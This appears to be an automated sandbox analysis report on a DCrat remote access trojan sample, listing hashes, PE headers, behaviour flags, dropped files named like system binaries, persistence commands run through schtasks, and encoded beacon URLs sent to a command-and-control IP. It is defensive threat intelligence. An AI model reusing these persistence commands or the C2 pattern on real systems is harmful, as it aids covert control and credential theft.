File name: a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Full analysis: https://app.any.run/tasks/0af4d91e-2c2d-4ffb-bce2-1a85a1769214
Verdict: Malicious activity
Threats: DCrat

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: March 31, 2023, 23:25:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: rat, backdoor, dcrat, evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA1: 30050F435AC1A07311E109F9082FBDC71B89AF01
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
SSDEEP: 98304:VF7qKmNA3fH/wbRd9H4yNRbVxMP31sAi92Dv6fv6mP0C68:L1munwbRd9YYRPM/6Ai9KSfy8nf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to the CnC server

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • DCRAT was detected

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Steals credentials from Web Browsers

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Actions look like stealing of personal data

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
  • SUSPICIOUS

    • Executed via WMI

      • schtasks.exe (PID: 2980)
      • schtasks.exe (PID: 2692)
      • schtasks.exe (PID: 2824)
      • schtasks.exe (PID: 2156)
      • schtasks.exe (PID: 2396)
      • schtasks.exe (PID: 2604)
      • schtasks.exe (PID: 2064)
      • schtasks.exe (PID: 2832)
      • schtasks.exe (PID: 2436)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 2820)
      • schtasks.exe (PID: 2128)
      • schtasks.exe (PID: 2636)
      • schtasks.exe (PID: 2916)
      • schtasks.exe (PID: 2308)
      • schtasks.exe (PID: 2508)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 2152)
      • schtasks.exe (PID: 2992)
      • schtasks.exe (PID: 2664)
      • schtasks.exe (PID: 2160)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 2340)
      • schtasks.exe (PID: 2684)
      • schtasks.exe (PID: 2088)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 3012)
      • schtasks.exe (PID: 2560)
      • schtasks.exe (PID: 2924)
      • schtasks.exe (PID: 2992)
      • schtasks.exe (PID: 2900)
      • schtasks.exe (PID: 2948)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 2916)
      • schtasks.exe (PID: 2300)
      • schtasks.exe (PID: 2464)
      • schtasks.exe (PID: 896)
      • schtasks.exe (PID: 2200)
      • schtasks.exe (PID: 2468)
      • schtasks.exe (PID: 412)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 2336)
      • schtasks.exe (PID: 2892)
      • schtasks.exe (PID: 2544)
      • schtasks.exe (PID: 2812)
      • schtasks.exe (PID: 2932)
      • schtasks.exe (PID: 2200)
      • schtasks.exe (PID: 2620)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 2996)
      • schtasks.exe (PID: 2952)
      • schtasks.exe (PID: 2844)
      • schtasks.exe (PID: 2076)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 2600)
      • schtasks.exe (PID: 2176)
      • schtasks.exe (PID: 2364)
      • schtasks.exe (PID: 2508)
      • schtasks.exe (PID: 2744)
      • schtasks.exe (PID: 2452)
      • schtasks.exe (PID: 2884)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 2772)
    • Creates executable files that already exist in Windows

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Executable content was dropped or overwritten

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • The process creates files with name similar to system file names

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Executing commands from a ".bat" file

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
    • Probably delays execution using 'w32tm.exe'

      • w32tm.exe (PID: 2696)
      • cmd.exe (PID: 2780)
    • Reads the Internet Settings

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Starts CMD.EXE for command execution

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
    • Starts itself from another location

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Checks for external IP

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads settings of System Certificates

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Adds/modifies Windows certificates

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Reads browser cookies

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Connects to the server without a host name

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
  • INFO

    • The process checks LSA protection

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Checks supported languages

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads the machine GUID from the registry

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads Environment values

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads the computer name

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Creates files in the program directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Creates files in a temporary directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Creates files or folders in the user directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:07:24 15:13:08+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 2929664
InitializedDataSize: 13824
UninitializedDataSize: -
EntryPoint: 0x1b1987
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.1.1.15
ProductVersionNumber: 1.1.1.15
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: -
FileDescription: -
FileVersion: 1.1.1o
InternalName: libcrypto
OriginalFileName: libcrypto
ProductName: -
ProductVersion: 1.1.1o
LegalCopyright: Copyright 1998-2022 The OpenSSL Authors. All rights reserved.

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 24-Jul-2022 15:13:08
Detected languages:
  • English - United States
CompanyName: -
FileDescription: -
FileVersion: 1.1.1o
InternalName: libcrypto
OriginalFilename: libcrypto
ProductName: -
ProductVersion: 1.1.1o
LegalCopyright: Copyright 1998-2022 The OpenSSL Authors. All rights reserved.

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 7
Time date stamp: 24-Jul-2022 15:13:08
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy
 | 0x002D8000 | 0x00280000 | 0x0002BA00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99804
.rsrc | 0x002D6000 | 0x00002000 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 2.64412
.data | 0x00558000 | 0x000E4000 | 0x000E2E00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.98266

Resources

Title | Entropy | Size | Codepage | Language | Type
1 | 3.33524 | 708 | UNKNOWN | English - United States | RT_VERSION

Imports

advapi32.dll
gdi32.dll
kernel32.dll
mscoree.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
No data.
All screenshots are available in the full report
Total processes: 102
Monitored processes: 69
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process chain shown in the graph: a28a2dac43cb3e22c3957bdcfe04aa1b.exe (start; drop and start), followed by repeated schtasks.exe (no specs), cmd.exe (no specs) and two w32tm.exe (no specs); a second a28a2dac43cb3e22c3957bdcfe04aa1b.exe, followed by further repeated schtasks.exe (no specs); a third a28a2dac43cb3e22c3957bdcfe04aa1b.exe tagged #DCRAT.

Process information

PID: 996
CMD: "C:\Users\admin\AppData\Local\Temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe"
Path: C:\Users\admin\AppData\Local\Temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Version: 1.1.1o
Modules (images):
c:\users\admin\appdata\local\temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
PID: 2604
CMD: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2692
CMD: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2824
CMD: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2980
CMD: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Skype\wininit.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\ntdll.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2064
CMD: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Skype\wininit.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2156
CMD: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Skype\wininit.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2396
CMD: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
PID: 2508
CMD: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
PID: 2636
CMD: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
Total events: 7 662
Read events: 7 606
Write events: 52
Delete events: 4

Modification events

Process: (996) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: (996) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

Process: (996) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

Process: (996) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

Process: (2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\da59a69626d179b3aa7f6c53d6465bd5382def8f
Operation: write
Name: d8081b475806e9f15df83834135a61801f743106
Value: (not recovered)

Process: (2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: (2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

Process: (2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

Process: (2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

Process: (316) a28a2dac43cb3e22c3957bdcfe04aa1b.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E
Operation: write
Name: LanguageList
Value: en-US
Executable files: 40
Suspicious files: 10
Text files: 48
Unknown types: 22

Dropped files

PID | Process | Filename | Type
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Users\Public\Pictures\Sample Pictures\services.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Windows\Tasks\lsass.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Windows\tracing\PowerTracker\System.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\ProgramData\Skype\wininit.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Users\Public\Libraries\System.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Users\Public\Documents\dwm.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Windows\Temp\886983d96e3d3e | text
MD5: 1BA95A8FF1C261948AE2DB09F4B0F340
SHA256: 86CD6FCF2BD5948E16B26E09C3BD898B7264062BE75216665D6E48644B53192B
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\ProgramData\Skype\56085415360792 | text
MD5: 0D1498FAF8A0704DF213EBDC61801584
SHA256: 34C3EECE82225353DF178502245ACF93CAE36AAFA96DD6DDE6D5138AA7DC2BD6
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Users\Public\Pictures\Sample Pictures\c5b4cb5e9653cc | text
MD5: F4864EA808BB1D7136E3AFA9221CD9D8
SHA256: 5504B67FF786D5F1842990C3F26BA0A2040339AC8F6BFCDA319B7D58413AEA14
996 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | C:\Users\admin\Pictures\Idle.exe | executable
MD5: A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256: 9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
HTTP(S) requests: 104
TCP/UDP connections: 7
DNS requests: 4
Threats: 0

HTTP requests

Columns: PID, Process, Method, HTTP Code, IP, URL, CN, Type, Size, Reputation
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&d67774f54f475434990c74d9288eddd9=0VfiIiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIzgzMjdzY4ATYiN2N1YGZiJ2NxQTMzEWN0EGOlhTO1QmN3EmZmV2YzIiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&a95b79107f938c457172bbb968cbdd6e=0VfiEFWrZ1RklnRHRmeClmYwR2VkNnQGlEdBNFVRJ0UPBzbU5UevRVT4FUeNlXQq1kdFpXT21keXJiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIzgzMjdzY4ATYiN2N1YGZiJ2NxQTMzEWN0EGOlhTO1QmN3EmZmV2YzIiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&a95b79107f938c457172bbb968cbdd6e=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
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | IP: 62.109.20.14:80
